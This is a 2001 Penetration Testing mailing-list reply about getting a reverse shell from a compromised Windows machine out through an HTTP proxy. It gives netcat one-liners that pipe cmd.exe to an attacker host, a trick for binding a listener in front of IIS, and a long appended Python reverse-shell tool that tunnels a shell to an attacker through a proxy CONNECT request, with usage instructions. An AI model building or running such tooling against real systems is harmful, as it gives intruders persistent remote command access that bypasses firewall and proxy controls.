Penetration Testing mailing list archives

Re: Reverse Http Shell Solution


From: "Jody Melbourne" <jody.melbourne () itacsecurity com>
Date: Fri, 19 Oct 2001 12:30:36 +1000

Hi,

> Does anybody know any solution based on the remote shell in Win32
> machines using Reverse Telnet through proxies?
> The proxy only permits HTTP 80/8080.

I think your situation is this: You have owned a machine which is behind a
firewall, and it only allows connections out via a proxy, so simple reverse
telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail.

You could try something like this:

Attacker: netcat -v -l -p 80

Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e cmd.exe

The HTTP/1.1 CONNECT method is the only way I can see you getting a nice
interactive command prompt if ports 80/8080 outbound are all you have to
play with. Remember that netcat can bind in FRONT of the existing IIS
process. If you spawn a netcat listener on 80, 443, 21, etc. with the '-l'
(listen once) option, the next person to connect to that port will get the
netcat listener. Any subsequent connections will see the IIS service.

cheers

.jm
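The CONNECT handshake the reply above relies on, worked through as an added example (this is not Jody's code or part of the original thread). It shows the two things a one-line echo into netcat does not do: the request header block is terminated by an empty line, and the proxy's status line is read and checked before the shell is attached to the socket, so that "HTTP/1.1 200 Connection established" is not the first thing cmd.exe is asked to execute. Bytes that arrive together with the proxy's reply are handed to the shell rather than dropped. The proxy and attacker names, the ports and the default of cmd.exe are placeholders, and the sample proxy replies in the usage are constructed.

```python
"""Reverse shell through an HTTP proxy using the CONNECT method.

Added illustration only; not from the original mailing-list post.
Host names, ports and the 'cmd.exe' default are assumed placeholders.
"""
import socket
import subprocess
import sys
import threading


def build_connect_request(host, port):
    """CONNECT request for host:port. The header block must end with an
    empty line (CRLF CRLF); a single echoed line never sends that."""
    return (
        f"CONNECT {host}:{port} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Proxy-Connection: keep-alive\r\n"
        "\r\n"
    ).encode("ascii")


def parse_connect_response(buf):
    """Parse the proxy's reply. Returns (status_code, leftover_bytes).

    (None, buf) means the header block is not complete yet. Bytes after the
    blank line already belong to the tunnelled stream (e.g. what the attacker
    typed into the listener) and must be delivered to the shell, not lost."""
    end = buf.find(b"\r\n\r\n")
    if end == -1:
        return None, buf
    status_line = buf[:end].decode("iso-8859-1").split("\r\n", 1)[0]
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    return int(parts[1]), buf[end + 4:]


def open_tunnel(proxy_host, proxy_port, dest_host, dest_port, timeout=10):
    """Connect to the proxy, issue CONNECT and return (socket, leftover)
    once the proxy answers 2xx; any other status aborts the attempt."""
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    s.sendall(build_connect_request(dest_host, dest_port))
    buf = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            s.close()
            raise ConnectionError("proxy closed the connection before replying")
        buf += chunk
        status, rest = parse_connect_response(buf)
        if status is not None:
            break
    if not 200 <= status < 300:
        s.close()
        raise ConnectionError(f"proxy refused CONNECT: HTTP {status}")
    s.settimeout(None)
    return s, rest


def tunnel_shell(proxy_host, proxy_port, dest_host, dest_port, shell="cmd.exe"):
    """Open the tunnel, then pump bytes between the socket and a shell.
    Pipes plus a relay thread are used instead of dup2 so the same code
    works where a socket handle cannot be passed as a child's stdio."""
    s, leftover = open_tunnel(proxy_host, proxy_port, dest_host, dest_port)
    proc = subprocess.Popen([shell], stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    if leftover:                      # commands that rode in with the 200
        proc.stdin.write(leftover)
        proc.stdin.flush()

    def sock_to_shell():
        while True:
            data = s.recv(4096)
            if not data:
                break
            proc.stdin.write(data)
            proc.stdin.flush()
        proc.stdin.close()

    threading.Thread(target=sock_to_shell, daemon=True).start()
    for out in iter(lambda: proc.stdout.read1(4096), b""):
        s.sendall(out)
    s.close()
    return proc.wait()


if __name__ == "__main__":
    # usage: python connect_shell.py proxyserver 8080 attacker 80 [shell]
    p_host, p_port, d_host, d_port = sys.argv[1], int(sys.argv[2]), sys.argv[3], int(sys.argv[4])
    sys.exit(tunnel_shell(p_host, p_port, d_host, d_port, *sys.argv[5:6]))
```

On the attacker side the listener is unchanged (`netcat -v -l -p 80`); the proxy will show a CONNECT to attacker:80 in its log, which is also the artefact a defender looks for when hunting this technique. A 407 reply means the proxy wants credentials, and a proxy that only allows CONNECT to port 443 will reject port 80 even though plain HTTP to it is permitted.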

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
